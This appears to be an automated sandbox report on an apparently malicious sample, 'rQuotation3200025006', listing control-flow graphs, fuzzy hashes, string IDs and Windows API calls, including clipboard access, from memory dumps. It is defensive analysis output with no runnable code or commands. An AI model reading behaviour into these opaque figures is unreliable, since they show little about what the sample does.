                                        control_flow_graph 0 693ade0-693adfe 1 693ae00-693ae03 0->1 2 693ae26-693ae29 1->2 3 693ae05-693ae21 1->3 4 693ae2f-693ae32 2->4 5 693affd-693b006 2->5 3->2 7 693ae46-693ae49 4->7 8 693ae34-693ae41 4->8 9 693ae89-693ae92 5->9 10 693b00c-693b016 5->10 13 693ae4b-693ae4f 7->13 14 693ae5a-693ae5d 7->14 8->7 11 693b017-693b04e 9->11 12 693ae98-693ae9c 9->12 28 693b050-693b053 11->28 16 693aea1-693aea4 12->16 13->10 18 693ae55 13->18 19 693ae67-693ae6a 14->19 20 693ae5f-693ae64 14->20 23 693aea6-693aeaf 16->23 24 693aeb4-693aeb6 16->24 18->14 21 693ae84-693ae87 19->21 22 693ae6c-693ae7f 19->22 20->19 21->9 21->16 22->21 23->24 26 693aeb8 24->26 27 693aebd-693aec0 24->27 26->27 27->1 32 693aec6-693aeea 27->32 29 693b076-693b079 28->29 30 693b055-693b071 28->30 33 693b07b 29->33 34 693b088-693b08b 29->34 30->29 47 693aef0-693aeff 32->47 48 693affa 32->48 123 693b07b call 693b343 33->123 124 693b07b call 693b348 33->124 36 693b098-693b09b 34->36 37 693b08d-693b091 34->37 41 693b0a1-693b0dc 36->41 42 693b304-693b307 36->42 40 693b093 37->40 37->41 39 693b081-693b083 39->34 40->36 52 693b0e2-693b0ee 41->52 53 693b2cf-693b2e2 41->53 45 693b314-693b316 42->45 46 693b309-693b313 42->46 49 693b318 45->49 50 693b31d-693b320 45->50 58 693af01-693af07 47->58 59 693af17-693af52 call 69366b0 47->59 48->5 49->50 50->28 54 693b326-693b330 50->54 60 693b0f0-693b109 52->60 61 693b10e-693b152 52->61 55 693b2e4 53->55 55->42 62 693af0b-693af0d 58->62 63 693af09 58->63 74 693af54-693af5a 59->74 75 693af6a-693af81 59->75 60->55 79 693b154-693b166 61->79 80 693b16e-693b1ad 61->80 62->59 63->59 77 693af5e-693af60 74->77 78 693af5c 74->78 89 693af83-693af89 75->89 90 693af99-693afaa 75->90 77->75 78->75 79->80 85 693b1b3-693b28e call 69366b0 80->85 86 693b294-693b2a9 80->86 85->86 86->53 91 693af8b 89->91 92 693af8d-693af8f 89->92 97 693afc2-693aff3 90->97 98 693afac-693afb2 90->98 91->90 92->90 97->48 99 693afb6-693afb8 98->99 100 693afb4 98->100 99->97 100->97 123->39 124->39
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: XM$XM$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2488550430
                                        • Opcode ID: 98d08998d7977ab898a79d75c39c6b5db8c38aa2250a44a49a0ae3afceb52317
                                        • Instruction ID: 7ee286b053cb0140954d8f06ec45fbb7429c4097ffe1bfae0b419ea119116ad2
                                        • Opcode Fuzzy Hash: 98d08998d7977ab898a79d75c39c6b5db8c38aa2250a44a49a0ae3afceb52317
                                        • Instruction Fuzzy Hash: CDE16C30E102198FCF69DF69D5846AEB7B6EF84300F208929D41AEB758DB35DC46CB91
                                        Function 06939260 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 990 6939260-6939285 991 6939287-693928a 990->991 992 69392b0-69392b3 991->992 993 693928c-69392ab 991->993 994 6939b73-6939b75 992->994 995 69392b9-69392ce 992->995 993->992 997 6939b77 994->997 998 6939b7c-6939b7f 994->998 1002 69392d0-69392d6 995->1002 1003 69392e6-69392fc 995->1003 997->998 998->991 1000 6939b85-6939b8f 998->1000 1004 69392da-69392dc 1002->1004 1005 69392d8 1002->1005 1007 6939307-6939309 1003->1007 1004->1003 1005->1003 1008 6939321-6939392 1007->1008 1009 693930b-6939311 1007->1009 1020 6939394-69393b7 1008->1020 1021 69393be-69393da 1008->1021 1010 6939313 1009->1010 1011 6939315-6939317 1009->1011 1010->1008 1011->1008 1020->1021 1026 6939406-6939421 1021->1026 1027 69393dc-69393ff 1021->1027 1032 6939423-6939445 1026->1032 1033 693944c-6939467 1026->1033 1027->1026 1032->1033 1038 6939492-693949c 1033->1038 1039 6939469-693948b 1033->1039 1040 693949e-69394a7 1038->1040 1041 69394ac-6939526 1038->1041 1039->1038 1040->1000 1047 6939573-6939588 1041->1047 1048 6939528-6939546 1041->1048 1047->994 1052 6939562-6939571 1048->1052 1053 6939548-6939557 1048->1053 1052->1047 1052->1048 1053->1052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q
                                        • API String ID: 0-2125118731
                                        • Opcode ID: ed4ed3da256c84186c8233af43e25252ea9f38f976ff35c8dbd66ade074f727b
                                        • Instruction ID: fc917094e032066c746b9800ec5646a969e2d647a506d14c133ab2045bd8aeeb
                                        • Opcode Fuzzy Hash: ed4ed3da256c84186c8233af43e25252ea9f38f976ff35c8dbd66ade074f727b
                                        • Instruction Fuzzy Hash: 80916D30B1021A8FDB54DB69D950BAEB3F6AFC9304F208569C80DEB344EB70DD468B95
                                        Function 0693D068 Relevance: 4.6, Strings: 3, Instructions: 801COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1056 693d068-693d083 1057 693d085-693d088 1056->1057 1058 693d0d1-693d0d4 1057->1058 1059 693d08a-693d099 1057->1059 1060 693d0d6-693d118 1058->1060 1061 693d11d-693d120 1058->1061 1062 693d09b-693d0a0 1059->1062 1063 693d0a8-693d0b4 1059->1063 1060->1061 1064 693d122-693d124 1061->1064 1065 693d12f-693d132 1061->1065 1062->1063 1066 693da85-693da9e 1063->1066 1067 693d0ba-693d0cc 1063->1067 1071 693d551 1064->1071 1072 693d12a 1064->1072 1068 693d134-693d139 1065->1068 1069 693d13c-693d13f 1065->1069 1082 693daa0-693daa4 1066->1082 1083 693daa5-693dabe 1066->1083 1067->1058 1068->1069 1073 693d141-693d183 1069->1073 1074 693d188-693d18b 1069->1074 1075 693d554-693d560 1071->1075 1072->1065 1073->1074 1080 693d1d4-693d1d7 1074->1080 1081 693d18d-693d1cf 1074->1081 1075->1059 1079 693d566-693d853 1075->1079 1271 693da7a-693da84 1079->1271 1272 693d859-693d85f 1079->1272 1086 693d220-693d223 1080->1086 1087 693d1d9-693d21b 1080->1087 1081->1080 1082->1083 1084 693dac0-693dac3 1083->1084 1089 693dae6-693dae9 1084->1089 1090 693dac5-693dae1 1084->1090 1091 693d225-693d267 1086->1091 1092 693d26c-693d26f 1086->1092 1087->1086 1098 693daeb-693db17 1089->1098 1099 693db1c-693db1f 1089->1099 1090->1089 1091->1092 1095 693d271-693d280 1092->1095 1096 693d2b8-693d2bb 1092->1096 1102 693d282-693d287 1095->1102 1103 693d28f-693d29b 1095->1103 1107 693d2ca-693d2cd 1096->1107 1108 693d2bd-693d2bf 1096->1108 1098->1099 1109 693db21 1099->1109 1110 693db2e-693db30 1099->1110 1102->1103 1103->1066 1113 693d2a1-693d2b3 1103->1113 1116 693d2ea-693d2ed 1107->1116 1117 693d2cf-693d2e5 1107->1117 1114 693d2c5 1108->1114 1115 693d40f-693d418 1108->1115 1318 693db21 call 693dbf0 1109->1318 1319 693db21 call 693dbdd 1109->1319 1118 693db32 1110->1118 1119 693db37-693db3a 1110->1119 1113->1096 1114->1107 1126 693d427-693d433 1115->1126 1127 693d41a-693d41f 1115->1127 1123 693d336-693d339 1116->1123 1124 693d2ef-693d331 1116->1124 1117->1116 1118->1119 1119->1084 1121 693db3c-693db4b 1119->1121 1148 693dbb2-693dbc7 1121->1148 1149 693db4d-693dbb0 call 69366b0 1121->1149 1134 693d33b-693d357 1123->1134 1135 693d35c-693d35f 1123->1135 1124->1123 1136 693d544-693d549 1126->1136 1137 693d439-693d44d 1126->1137 1127->1126 1131 693db27-693db29 1131->1110 1134->1135 1135->1075 1144 693d365-693d368 1135->1144 1136->1071 1137->1071 1162 693d453-693d465 1137->1162 1153 693d3b1-693d3b4 1144->1153 1154 693d36a-693d3ac 1144->1154 1175 693dbc8 1148->1175 1149->1148 1156 693d3b6-693d3f8 1153->1156 1157 693d3fd-693d3ff 1153->1157 1154->1153 1156->1157 1166 693d401 1157->1166 1167 693d406-693d409 1157->1167 1179 693d467-693d46d 1162->1179 1180 693d489-693d48b 1162->1180 1166->1167 1167->1057 1167->1115 1175->1175 1185 693d471-693d47d 1179->1185 1186 693d46f 1179->1186 1184 693d495-693d4a1 1180->1184 1195 693d4a3-693d4ad 1184->1195 1196 693d4af 1184->1196 1189 693d47f-693d487 1185->1189 1186->1189 1189->1184 1200 693d4b4-693d4b6 1195->1200 1196->1200 1200->1071 1204 693d4bc-693d4d8 call 69366b0 1200->1204 1214 693d4e7-693d4f3 1204->1214 1215 693d4da-693d4df 1204->1215 1214->1136 1217 693d4f5-693d542 1214->1217 1215->1214 1217->1071 1273 693d861-693d866 1272->1273 1274 693d86e-693d877 1272->1274 1273->1274 1274->1066 1275 693d87d-693d890 1274->1275 1277 693d896-693d89c 1275->1277 1278 693da6a-693da74 1275->1278 1279 693d8ab-693d8b4 1277->1279 1280 693d89e-693d8a3 1277->1280 1278->1271 1278->1272 1279->1066 1281 693d8ba-693d8db 1279->1281 1280->1279 1284 693d8ea-693d8f3 1281->1284 1285 693d8dd-693d8e2 1281->1285 1284->1066 1286 693d8f9-693d916 1284->1286 1285->1284 1286->1278 1289 693d91c-693d922 1286->1289 1289->1066 1290 693d928-693d941 1289->1290 1292 693d947-693d96e 1290->1292 1293 693da5d-693da64 1290->1293 1292->1066 1296 693d974-693d97e 1292->1296 1293->1278 1293->1289 1296->1066 1297 693d984-693d99b 1296->1297 1299 693d9aa-693d9c5 1297->1299 1300 693d99d-693d9a8 1297->1300 1299->1293 1305 693d9cb-693d9e4 call 69366b0 1299->1305 1300->1299 1309 693d9f3-693d9fc 1305->1309 1310 693d9e6-693d9eb 1305->1310 1309->1066 1311 693da02-693da56 1309->1311 1310->1309 1311->1293 1318->1131 1319->1131
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q
                                        • API String ID: 0-831282457
                                        • Opcode ID: 9fe4e2889affd861365fa77c4c8583825394c3700591b0aa081a78bd2afaee88
                                        • Instruction ID: 8ffa639a89c358bf11556a4c802cd068ea02b3235fc6e00bb978bbdc635957a0
                                        • Opcode Fuzzy Hash: 9fe4e2889affd861365fa77c4c8583825394c3700591b0aa081a78bd2afaee88
                                        • Instruction Fuzzy Hash: 74623F30A002168FCB55EB69D590A5EB7F2FF84304F208A29D409DF769DB71ED4ACB81
                                        Function 060B4690 Relevance: 4.1, Strings: 3, Instructions: 341COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1320 60b4690-60b46b5 1321 60b46bb-60b46bd 1320->1321 1322 60b480a-60b482e 1320->1322 1324 60b46c3-60b46cc 1321->1324 1325 60b4835-60b48ba 1321->1325 1322->1325 1327 60b46df-60b4706 1324->1327 1328 60b46ce-60b46dc 1324->1328 1358 60b497b 1325->1358 1359 60b48c0-60b48d3 1325->1359 1330 60b470c-60b471f call 60b43dc 1327->1330 1331 60b4790-60b4794 1327->1331 1328->1327 1330->1331 1347 60b4721-60b4774 1330->1347 1335 60b47cb-60b47e4 1331->1335 1336 60b4796-60b47c3 call 60b43ec 1331->1336 1342 60b47ee 1335->1342 1343 60b47e6 1335->1343 1350 60b47c8 1336->1350 1342->1322 1343->1342 1347->1331 1352 60b4776-60b4789 1347->1352 1350->1335 1352->1331 1360 60b4980-60b498b 1358->1360 1359->1358 1364 60b48d9-60b48e5 1359->1364 1365 60b4992-60b49bb 1360->1365 1364->1360 1368 60b48eb-60b4916 1364->1368 1369 60b49bd-60b49c6 1365->1369 1370 60b49c7-60b4a9c 1365->1370 1368->1358 1378 60b4918-60b4924 1368->1378 1390 60b4aa2-60b4ab0 1370->1390 1379 60b4970-60b497a 1378->1379 1380 60b4926-60b4929 1378->1380 1382 60b492c-60b4935 1380->1382 1382->1365 1384 60b4937-60b4952 1382->1384 1385 60b495a-60b495d 1384->1385 1386 60b4954-60b4956 1384->1386 1385->1358 1389 60b495f-60b496e 1385->1389 1386->1358 1388 60b4958 1386->1388 1388->1389 1389->1379 1389->1382 1392 60b4ab9-60b4af1 1390->1392 1393 60b4ab2-60b4ab8 1390->1393 1397 60b4af3-60b4af7 1392->1397 1398 60b4b01 1392->1398 1393->1392 1397->1398 1399 60b4af9 1397->1399 1400 60b4b02 1398->1400 1399->1398 1400->1400
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (bq$(bq$(bq
                                        • API String ID: 0-2716923250
                                        • Opcode ID: 4d0bf0c2b12e415bf5173778e5ca7be9221ad6c63efbac3538dd9c135edfd235
                                        • Instruction ID: e1d3458dc1384c6b34f10812aa0ac57700b80f259851ff03b786966353ecc9d3
                                        • Opcode Fuzzy Hash: 4d0bf0c2b12e415bf5173778e5ca7be9221ad6c63efbac3538dd9c135edfd235
                                        • Instruction Fuzzy Hash: C7D1AC30E402099FCB44DFA9C8546AEBBF2EF88310F14C569E405AB395DB74AE41CB91
                                        Function 06934C78 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1401 6934c78-6934c9c 1402 6934c9e-6934ca1 1401->1402 1403 6934ca3-6934cbd 1402->1403 1404 6934cc2-6934cc5 1402->1404 1403->1404 1405 69353a4-69353a6 1404->1405 1406 6934ccb-6934dc3 1404->1406 1407 69353a8 1405->1407 1408 69353ad-69353b0 1405->1408 1424 6934e46-6934e4d 1406->1424 1425 6934dc9-6934e11 1406->1425 1407->1408 1408->1402 1410 69353b6-69353c3 1408->1410 1426 6934e53-6934ec3 1424->1426 1427 6934ed1-6934eda 1424->1427 1446 6934e16 call 6935523 1425->1446 1447 6934e16 call 6935530 1425->1447 1444 6934ec5 1426->1444 1445 6934ece 1426->1445 1427->1410 1438 6934e1c-6934e38 1441 6934e43 1438->1441 1442 6934e3a 1438->1442 1441->1424 1442->1441 1444->1445 1445->1427 1446->1438 1447->1438
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$XPcq$\Ocq
                                        • API String ID: 0-3575482020
                                        • Opcode ID: a3012a9e48d29cf1d96d224442d5c0554e22426d65de91a7f97c5f647bacc720
                                        • Instruction ID: cc330f2469be9076e7befb1462bc230da5ecc3749466cfd00c4e8bdae6df395f
                                        • Opcode Fuzzy Hash: a3012a9e48d29cf1d96d224442d5c0554e22426d65de91a7f97c5f647bacc720
                                        • Instruction Fuzzy Hash: 3B615D31E002189FEB54DFB5C855BAEBBF6FB88700F208829E105AB395DB758D458B91
                                        Function 060B1DC0 Relevance: 2.8, Strings: 2, Instructions: 267COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2256 60b1dc0-60b1de8 2259 60b1dee-60b1e18 2256->2259 2260 60b20e6-60b20f0 2256->2260 2263 60b1e1a-60b1e1c 2259->2263 2264 60b1e24-60b1e27 2259->2264 2265 60b1e22 2263->2265 2266 60b20f1 2263->2266 2264->2266 2267 60b1e2d-60b1e45 2264->2267 2265->2267 2269 60b20f6-60b2127 2266->2269 2272 60b1e4d-60b1e6c 2267->2272 2272->2269 2275 60b1e72-60b1fd0 2272->2275 2290 60b20d7-60b20e0 2275->2290 2291 60b1fd6-60b1fdf 2275->2291 2290->2259 2290->2260 2292 60b1fe3-60b2046 2291->2292 2297 60b2048-60b204a 2292->2297 2298 60b2052-60b2055 2292->2298 2297->2266 2299 60b2050 2297->2299 2298->2266 2300 60b205b-60b206d 2298->2300 2299->2300 2300->2269 2301 60b2073-60b209d 2300->2301 2303 60b209f-60b20a1 2301->2303 2304 60b20a5-60b20a8 2301->2304 2303->2266 2305 60b20a3 2303->2305 2304->2266 2306 60b20aa-60b20bc 2304->2306 2305->2306 2306->2269 2307 60b20be-60b20d1 2306->2307 2307->2290 2307->2292
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: nKvq$nKvq
                                        • API String ID: 0-2223595353
                                        • Opcode ID: 7236bb4012440fce99d1ad5b32760efcd6477cb565f117157a4d218a521b851c
                                        • Instruction ID: 3e4fbaaa5a6716f0e1d838ed27f1fe1e6dfff60bc1eac1b6b13a70bbc279dd91
                                        • Opcode Fuzzy Hash: 7236bb4012440fce99d1ad5b32760efcd6477cb565f117157a4d218a521b851c
                                        • Instruction Fuzzy Hash: 29B16C75E006068FCB54DF68C4909AEFBB2BF88310B15C655ED55AB366DB30ED82CB90
                                        Function 060B1DB0 Relevance: 2.7, Strings: 2, Instructions: 249COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2309 60b1db0-60b1db8 2310 60b1dba-60b1dc6 2309->2310 2311 60b1dc8-60b1de8 2309->2311 2310->2311 2314 60b1dee-60b1e18 2311->2314 2315 60b20e6-60b20f0 2311->2315 2318 60b1e1a-60b1e1c 2314->2318 2319 60b1e24-60b1e27 2314->2319 2320 60b1e22 2318->2320 2321 60b20f1 2318->2321 2319->2321 2322 60b1e2d-60b1e45 2319->2322 2320->2322 2324 60b20f6-60b2127 2321->2324 2327 60b1e4d-60b1e6c 2322->2327 2327->2324 2330 60b1e72-60b1fd0 2327->2330 2345 60b20d7-60b20e0 2330->2345 2346 60b1fd6-60b1fdf 2330->2346 2345->2314 2345->2315 2347 60b1fe3-60b2046 2346->2347 2352 60b2048-60b204a 2347->2352 2353 60b2052-60b2055 2347->2353 2352->2321 2354 60b2050 2352->2354 2353->2321 2355 60b205b-60b206d 2353->2355 2354->2355 2355->2324 2356 60b2073-60b209d 2355->2356 2358 60b209f-60b20a1 2356->2358 2359 60b20a5-60b20a8 2356->2359 2358->2321 2360 60b20a3 2358->2360 2359->2321 2361 60b20aa-60b20bc 2359->2361 2360->2361 2361->2324 2362 60b20be-60b20d1 2361->2362 2362->2345 2362->2347
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4189706558.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_60b0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: nKvq$nKvq
                                        • API String ID: 0-2223595353
                                        • Opcode ID: 5463e854004fca27b630ed8ff5ba95ab883c9b2ac51fc521fe575ff74ee79840
                                        • Instruction ID: d8fb42065952f566cb91703a882fa44ce0cdcc8d59e6c13000ffd8fc198ebae8
                                        • Opcode Fuzzy Hash: 5463e854004fca27b630ed8ff5ba95ab883c9b2ac51fc521fe575ff74ee79840
                                        • Instruction Fuzzy Hash: 71B14935E006068FCB58DF58C4909AEFBB2BF88310B158655ED55AB356DB30FD82CB90
                                        Function 06939253 Relevance: 2.7, Strings: 2, Instructions: 166COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2510 6939253-6939285 2511 6939287-693928a 2510->2511 2512 69392b0-69392b3 2511->2512 2513 693928c-69392ab 2511->2513 2514 6939b73-6939b75 2512->2514 2515 69392b9-69392ce 2512->2515 2513->2512 2517 6939b77 2514->2517 2518 6939b7c-6939b7f 2514->2518 2522 69392d0-69392d6 2515->2522 2523 69392e6-69392fc 2515->2523 2517->2518 2518->2511 2520 6939b85-6939b8f 2518->2520 2524 69392da-69392dc 2522->2524 2525 69392d8 2522->2525 2527 6939307-6939309 2523->2527 2524->2523 2525->2523 2528 6939321-6939392 2527->2528 2529 693930b-6939311 2527->2529 2540 6939394-69393b7 2528->2540 2541 69393be-69393da 2528->2541 2530 6939313 2529->2530 2531 6939315-6939317 2529->2531 2530->2528 2531->2528 2540->2541 2546 6939406-6939421 2541->2546 2547 69393dc-69393ff 2541->2547 2552 6939423-6939445 2546->2552 2553 693944c-6939467 2546->2553 2547->2546 2552->2553 2558 6939492-693949c 2553->2558 2559 6939469-693948b 2553->2559 2560 693949e-69394a7 2558->2560 2561 69394ac-6939526 2558->2561 2559->2558 2560->2520 2567 6939573-6939588 2561->2567 2568 6939528-6939546 2561->2568 2567->2514 2572 6939562-6939571 2568->2572 2573 6939548-6939557 2568->2573 2572->2567 2572->2568 2573->2572
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q
                                        • API String ID: 0-355816377
                                        • Opcode ID: 46d5e5512c01e9fad730f8f9bd502f12a347498c41c09a0098125d019eade238
                                        • Instruction ID: 41cfe89d539ea064225418c3f7bb30f9b6fa05500991013e1f8b6bef4737b709
                                        • Opcode Fuzzy Hash: 46d5e5512c01e9fad730f8f9bd502f12a347498c41c09a0098125d019eade238
                                        • Instruction Fuzzy Hash: 2B514E30B101159FDB54EB79D990BAEB3FAABC8344F108469C40DEB388EB71DC428B95
                                        Function 06934C69 Relevance: 2.6, Strings: 2, Instructions: 137COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2576 6934c69-6934c9c 2577 6934c9e-6934ca1 2576->2577 2578 6934ca3-6934cbd 2577->2578 2579 6934cc2-6934cc5 2577->2579 2578->2579 2580 69353a4-69353a6 2579->2580 2581 6934ccb-6934dc3 2579->2581 2582 69353a8 2580->2582 2583 69353ad-69353b0 2580->2583 2599 6934e46-6934e4d 2581->2599 2600 6934dc9-6934e11 2581->2600 2582->2583 2583->2577 2585 69353b6-69353c3 2583->2585 2601 6934e53-6934ec3 2599->2601 2602 6934ed1-6934eda 2599->2602 2621 6934e16 call 6935523 2600->2621 2622 6934e16 call 6935530 2600->2622 2619 6934ec5 2601->2619 2620 6934ece 2601->2620 2602->2585 2613 6934e1c-6934e38 2616 6934e43 2613->2616 2617 6934e3a 2613->2617 2616->2599 2617->2616 2619->2620 2620->2602 2621->2613 2622->2613
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: fcq$XPcq
                                        • API String ID: 0-936005338
                                        • Opcode ID: 9f36968471a77c0181230b60651007113ef8c948be0a37b12787a868f71c5900
                                        • Instruction ID: bb418e3913d6d551bb45081449ad4741e44f810ba8070a1fc2c4891a47400803
                                        • Opcode Fuzzy Hash: 9f36968471a77c0181230b60651007113ef8c948be0a37b12787a868f71c5900
                                        • Instruction Fuzzy Hash: 49517D71F102189FDB55DFB4C855BAEBBF6BF88700F208929E105EB395DA758C018B91
                                        Function 02A6EEA0 Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4161716705.0000000002A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_2a60000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3fdb09d282cc7c5d452cf3d7f9b75058edd46d9a0de1fefe314873baaa6f1b04
                                        • Instruction ID: 222fb66981f256ebea178acc3a6c9debeaa7cd33870a5203610e0ff79776b885
                                        • Opcode Fuzzy Hash: 3fdb09d282cc7c5d452cf3d7f9b75058edd46d9a0de1fefe314873baaa6f1b04
                                        • Instruction Fuzzy Hash: E8411332E103558FCB14DFA9D8446AEBBF5FF88320F14866AE409A7350DB78A841CBD0
                                        Function 06925FD3 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 069260EA
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: d3e808d2547b7e4edad550740fcf141d7c4e00e3f56a48ce47a14fd4b2155b99
                                        • Instruction ID: de752e5038f8aefa9e9a18d8e4d2a5ad71923421dc44ce67307d18d00754dae8
                                        • Opcode Fuzzy Hash: d3e808d2547b7e4edad550740fcf141d7c4e00e3f56a48ce47a14fd4b2155b99
                                        • Instruction Fuzzy Hash: ED51D0B5D00319DFDB14CF9AC984ADEBFB5BF48300F24852AE419AB614D775A885CF90
                                        Function 06925FD8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 069260EA
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 52afb1cdc86f3332b47d3829d8254a4475e69b2670a75e1bf90548f10767bf02
                                        • Instruction ID: e86063c0c7fe0849c5fefd9ee6ecffdc2361ba5ad616271e26484083ccf89af7
                                        • Opcode Fuzzy Hash: 52afb1cdc86f3332b47d3829d8254a4475e69b2670a75e1bf90548f10767bf02
                                        • Instruction Fuzzy Hash: AC41E0B1D00319DFDB14CF9AC980ADEBFB5BF48300F20852AE818AB214D771A885CF90
                                        Function 06929AB4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                        Download Yara Rule
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0692AE29
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        • Opcode ID: 3593c1f7f452e8012c8c96a490968de6f3d395acf1b5dbe9b68558158ed3884a
                                        • Instruction ID: d7d8b06344e3f24a8cfa268775a934997fdaa118210f8ff061bb862b8023ba7f
                                        • Opcode Fuzzy Hash: 3593c1f7f452e8012c8c96a490968de6f3d395acf1b5dbe9b68558158ed3884a
                                        • Instruction Fuzzy Hash: 304129B5A00315CFCB54DF99C888AAABBF5FF88314F24C859D519AB325D734A841CFA0
                                        Function 0692B4D0 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0
                                        • Opcode ID: a22841f4af9b7092df4a1184857097e92d53d3e0c4705d771ba6c72d092e2035
                                        • Instruction ID: ebb72bb862ae7d8b56de3a09ae3ec522bb6da1b2d39b9ba3d25fb48e94f62f7b
                                        • Opcode Fuzzy Hash: a22841f4af9b7092df4a1184857097e92d53d3e0c4705d771ba6c72d092e2035
                                        • Instruction Fuzzy Hash: 8C3112B0D01219DFDB50CF99C985BDEBBF5AF48308F208459E404BB298DB75A885CFA5
